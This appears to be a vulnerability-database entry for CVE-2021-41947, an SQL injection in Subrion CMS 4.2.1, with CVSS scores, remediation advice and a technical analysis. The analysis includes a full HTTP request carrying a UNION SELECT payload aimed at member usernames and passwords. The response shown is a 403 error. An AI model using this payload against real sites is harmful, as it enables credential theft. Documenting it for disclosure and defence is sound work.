Attacker Value
Moderate
(1 user assessed)
Exploitability
Low
(1 user assessed)
User Interaction
None
Privileges Required
High
Attack Vector
Network
2

CVE-2021-41947

Disclosure Date: October 08, 2021
CVE-2021-41947 CVSS v3 Base Score: 7.2
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Credential Access
Techniques
Validation
Validated
Validated
Validated

Description

A SQL injection vulnerability exists in Subrion CMS v4.2.1 in the visual-mode.

Add Assessment

1
Ratings
  • Attacker Value
    Medium
  • Exploitability
    Low
Difficult to patchGives privileged accessVulnerable in default configuration
Technical Analysis

CVE-2021-41947

Description:

A SQL statement in request parameter vulnerability exists in Subrion CMS v4.2.1 in the visual-mode.
This application should not incorporate any user-controllable data directly into SQL queries.
Parameterized queries (also known as prepared statements) should be used to safely insert data into predefined queries.
In no circumstances should users be able to control or modify the structure of the SQL query itself?

MySQL Request:

GET /panel/visual-mode.json?get=access&type=blocks%27%20UNION%20ALL%20SELECT%20username,%20password%20FROM%20sbr421_members%20--%20-&object=landing_what_is_this&page=index HTTP/1.1
Host: 192.168.1.4
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0

MySQL Response:

HTTP/1.1 200 OK
Date: Sat, 16 Oct 2021 16:40:30 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Set-Cookie: INTELLI_c8e38fc98c=arfqsm98vhdqe3s8kod7nokh56; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: INTELLI_c8e38fc98c=arfqsm98vhdqe3s8kod7nokh56; expires=Sat, 16-Oct-2021 17:10:30 GMT; Max-Age=1800; path=/
Content-Length: 72
Connection: close
Content-Type: application/json

{"error":true,"message":"Action is forbidden.","code":403,"result":true}

Risk:

  • Medium

Reproduce:

href

Proof

href

Log in to Add Reply
CVSS V3 Severity and Metrics
Base Score:
7.2 High
Impact Score:
5.9
Exploitability Score:
1.2
Vector:
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
High
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Offensive Application
Unknown
Utility Class
Unknown
Ports
Unknown
OS
Unknown
Vulnerable Versions
n/a
Prerequisites
Unknown
Discovered By
Unknown
PoC Author
Unknown
Metasploit Module
Unknown
Reporter
Unknown

Vendors

  • intelliants

Products

  • subrion cms 4.2.1

Additional Info

Authenticated
Unknown
Exploitable
Unknown
Reliability
Unknown
Stability
Unknown
Available Mitigations
Unknown
Shelf Life
Unknown
Userbase/Installbase
Unknown
Patch Effectiveness
Unknown
Technical Analysis